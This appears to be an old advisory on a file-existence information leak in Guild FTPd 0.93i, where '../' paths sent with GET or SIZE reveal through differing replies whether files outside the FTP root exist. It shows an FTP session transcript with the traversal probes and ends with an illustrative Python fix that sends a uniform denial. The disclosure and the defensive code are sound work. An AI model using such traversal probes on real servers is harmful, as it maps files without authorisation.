COMMAND

    Guild FTPd

SYSTEMS AFFECTED

    Guild FTPd

PROBLEM

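    Andrew Lewis found the following.  It is a more minor vulnerability
    in Guild FTPd: although directory traversal with GET can't be used
    to download files outside of the FTP root directory, it can be used
    to see if files exist.  In the example that follows, the request
    for a file that does not exist gets "550 Access denied.", while the
    request for a file that does exist gets a 150 reply that includes
    its size before the download fails.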

        C:\wizdumb>ftp localhost
        Connected to kung-phusion.
        220-GuildFTPD FTP Server (c) 1999
        220-Version 0.93i
        220 Please enter your name:
        User (kung-phusion:(none)): test
        331 User name okay, Need password.
        Password:
        230 User logged in.
        ftp> cd ..
        550 Access denied.
        ftp> get ../nonexistant.txt
        200 PORT command successful.
        550 Access denied.
        ftp> get ../autoexec.bat
        200 PORT command successful.
        150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
        425 Download failed.
        ftp> quit
        221 Goodbye.  Control connection closed.

    The SIZE command can also be used in a similar manner.

SOLUTION

    Nothing yet.
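
    The sketch below is an added example, not Guild FTPd code and not
    a vendor fix.  It shows one way a server can close this oracle:
    decide root containment before touching the filesystem and send
    the same reply for every refused path, for both GET (RETR) and
    SIZE.  The names virtual_path, reply_for and demo, and the
    temporary directory tree, are constructed for illustration.

```python
import os
import tempfile

DENIED = (550, "Access denied.")  # one reply for every refused path

def virtual_path(cwd, arg):
    """Lexically resolve a client path against the virtual cwd; None if it climbs above '/'."""
    arg = arg.replace("\\", "/")              # treat both separators alike
    joined = arg if arg.startswith("/") else cwd + "/" + arg
    parts = []
    for part in joined.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:
                return None                   # would leave the FTP root
            parts.pop()
        else:
            parts.append(part)
    return "/" + "/".join(parts)


def reply_for(root, cwd, arg, command="RETR"):
    """Reply for RETR or SIZE; realpath also refuses links that resolve outside the root."""
    vpath = virtual_path(cwd, arg)
    if vpath is None:
        return DENIED                         # refused before any stat() or open()
    real_root = os.path.realpath(root)
    real = os.path.realpath(os.path.join(real_root, vpath.lstrip("/")))
    if real != real_root and not real.startswith(real_root + os.sep):
        return DENIED
    if not os.path.isfile(real):
        return DENIED
    size = os.path.getsize(real)
    if command == "SIZE":
        return (213, str(size))
    return (150, f"Opening data connection for {vpath} ({size} bytes).")


def demo():
    """Constructed tree: <tmp>/autoexec.bat exists but sits outside <tmp>/ftproot."""
    with tempfile.TemporaryDirectory() as parent:
        root = os.path.join(parent, "ftproot")
        os.mkdir(root)
        for path in (os.path.join(parent, "autoexec.bat"), os.path.join(root, "readme.txt")):
            with open(path, "wb") as fh:
                fh.write(b"x" * 16)
        args = ("../nonexistant.txt", "../autoexec.bat", "..\\autoexec.bat", "readme.txt")
        return {a: reply_for(root, "/", a) for a in args}
```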